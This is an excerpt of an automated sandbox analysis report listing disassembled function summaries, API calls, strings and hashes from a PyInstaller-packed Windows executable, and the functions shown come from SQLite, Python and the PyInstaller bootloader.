                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_CompareStringUnicode_With$ArgumentCheckPositionalSubtypeType_
                                                                                                                                                                                                                                              • String ID: argument 1$argument 2$normalize$str
                                                                                                                                                                                                                                              • API String ID: 4101545800-1320425463
                                                                                                                                                                                                                                              • Opcode ID: 6a3206665d50624963465f038f79663c2d3d68664346081dad0779ef5a43a2b4
                                                                                                                                                                                                                                              • Instruction ID: f3783b419ef62b3d59ade9fc141c4047fbef046baa5f430d556878a47f02bd23
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a3206665d50624963465f038f79663c2d3d68664346081dad0779ef5a43a2b4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF118661F18A8688EB588B11E470EBA7760BF54FC4F8480B5D92D076DCCE2CD44EC754
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                              • String ID: argument 1$argument 2$is_normalized$str
                                                                                                                                                                                                                                              • API String ID: 3876575403-184702317
                                                                                                                                                                                                                                              • Opcode ID: 7c950a274d1c530a4e2b2ee5c75bc666441a244dd8d061769435580234d1272f
                                                                                                                                                                                                                                              • Instruction ID: fef90f4a78c521f0829b93eb2cd2a0af5d7b86c84d2bc5e5d107d9eb4c1b0e34
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c950a274d1c530a4e2b2ee5c75bc666441a244dd8d061769435580234d1272f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B018260F08A8699EB588B51E4A1FB53361AB14FC4F8490B1D92E072DCCE2CD48EC300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDFABD67FE
                                                                                                                                                                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00007FFDFABD6AFE
                                                                                                                                                                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 00007FFDFABD67D5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                              • API String ID: 438689982-272990098
                                                                                                                                                                                                                                              • Opcode ID: 9cbe160e30e237f4906a042bf25e86bf704ec8520060b0cc770f4883f574f888
                                                                                                                                                                                                                                              • Instruction ID: ee5c807a673c055b9acb5ac53063593eb5bf9704ca97a334c2fecfdda3946c94
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cbe160e30e237f4906a042bf25e86bf704ec8520060b0cc770f4883f574f888
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2D1E062F1978282EB288B15A474AB93B91FB55BD4F8841B2DEAD077C9DF3CE441C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 438689982-3727861699
                                                                                                                                                                                                                                              • Opcode ID: d34391e6d3d6271bf35f46571239bf28f8455564d61c842ce53984c41de6952a
                                                                                                                                                                                                                                              • Instruction ID: 10fec1c3843772dfadceff66acf1916a21d2ed3d357b901b0de5bbd1f344f221
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d34391e6d3d6271bf35f46571239bf28f8455564d61c842ce53984c41de6952a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63D1CE72B0C68586DB68CF19E460AA9B7A8FB88B48F954132DE5D47798DF3CD805C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memmove
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 2162964266-3727861699
                                                                                                                                                                                                                                              • Opcode ID: b96d72c1d7f2f0b15a15af28fe8bcf2d98dfa3ab5332cd19302b67252b29adcf
                                                                                                                                                                                                                                              • Instruction ID: bc64cb2549760228b426dbdca2a316c8ee70b79ae4cc948ec12c7368e7f069bd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b96d72c1d7f2f0b15a15af28fe8bcf2d98dfa3ab5332cd19302b67252b29adcf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D912367B0878686D764CB25E460ABEBBA0FB48B88F844132DE9D43B99DF3CD155C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                              • API String ID: 438689982-2063813899
                                                                                                                                                                                                                                              • Opcode ID: 04c7ac160417419a773f1a03789a70658ed0dc70c10830113a31aabe6f2124d7
                                                                                                                                                                                                                                              • Instruction ID: 6b1159ef4f20e18b1e384d597b5865c8766dcb7d188757f8abaa85eb09dbacd4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04c7ac160417419a773f1a03789a70658ed0dc70c10830113a31aabe6f2124d7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F691D562B09B8182EB58CF51A464ABD77A5FB84B80F864275DFAD47789DF3CE491C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memmove
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 1283327689-3727861699
                                                                                                                                                                                                                                              • Opcode ID: d6c2de245197fd657a47ab872946567a82268274e8349ceedc22926713eb6fd9
                                                                                                                                                                                                                                              • Instruction ID: a18cac49fc10c319ca6421d37c83859cc69f5be926a3dcae0b39d475566208c8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6c2de245197fd657a47ab872946567a82268274e8349ceedc22926713eb6fd9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF91E262B082819AD718CB66D5A0ABD7BE0FB48B48F848176DBAD476C9DF3CF455C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F8EFD
                                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F8F5A
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62C0F45F4,00000000,00007FF62C0F1985), ref: 00007FF62C0F93C9
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F8FE5
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F9044
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F9055
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F906A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                                              • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                              • Instruction ID: 44356a712a68c97eadaba6ecb8119595440f666e91318339acc210f2a1d39689
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B141D462B1968289EE309B12A8412BA7394FF85BE0F040135DF8D97789DF3EE580C709
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetCurrentProcess.KERNEL32 ref: 00007FF62C0F8590
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: OpenProcessToken.ADVAPI32 ref: 00007FF62C0F85A3
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetTokenInformation.ADVAPI32 ref: 00007FF62C0F85C8
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetLastError.KERNEL32 ref: 00007FF62C0F85D2
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetTokenInformation.ADVAPI32 ref: 00007FF62C0F8612
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62C0F862E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: CloseHandle.KERNEL32 ref: 00007FF62C0F8646
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF62C0F3C55), ref: 00007FF62C0F916C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF62C0F3C55), ref: 00007FF62C0F9175
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                              • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                              • Instruction ID: c931efda4175f5d1b75a5cabb4956b3dbd1db6a7913f30cea336931e4ebf479f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7217121A08B4245FF11AB10ED1A2EA6360FF89BA0F444031EE4DC3786DF3DD985C786
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B2D7
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B30D
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B33A
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B34B
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B35C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B377
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              • Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                              • Instruction ID: bdaac7af94d41d578575a97c9ed01ecc0d517fbd05849839102e72cf7e74eb96
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68113024B0C64282FE58A7255E5B13D61529F497B0F248738ED6ECBAD6EE2DF4614303
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62C0F1B6A), ref: 00007FF62C0F295E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                              • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                              • Instruction ID: eb1945402f5b3ce93bd321c5c70b1af51b2f1e43aef729a147c8e485069f2159
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E313562B18A8146EF209765AC422E76294BF887F8F400132FE8CC3789EF7CD586C241
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                              • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                              • Instruction ID: 78f4a0f4665ebe558c9d8f4fe83a1ce740a31a568ba874358303eaf6e3a3ce4a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F319072619A8288EF20DB25EC5A2F96360FF887A4F440135EE4E87B49DF7CD145C702
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF62C0F918F,?,00007FF62C0F3C55), ref: 00007FF62C0F2BA0
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF62C0F2C2A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                              • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                              • Instruction ID: 2cec8ca5f0b50406f41d5ca78096f05a42cdc10a41819766b9aadb76dc93387f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C821D162708B4186EB209B18F8467EA63A4EB88794F400136EE8D93655DF3CD245C741
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF62C0F1B99), ref: 00007FF62C0F2760
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
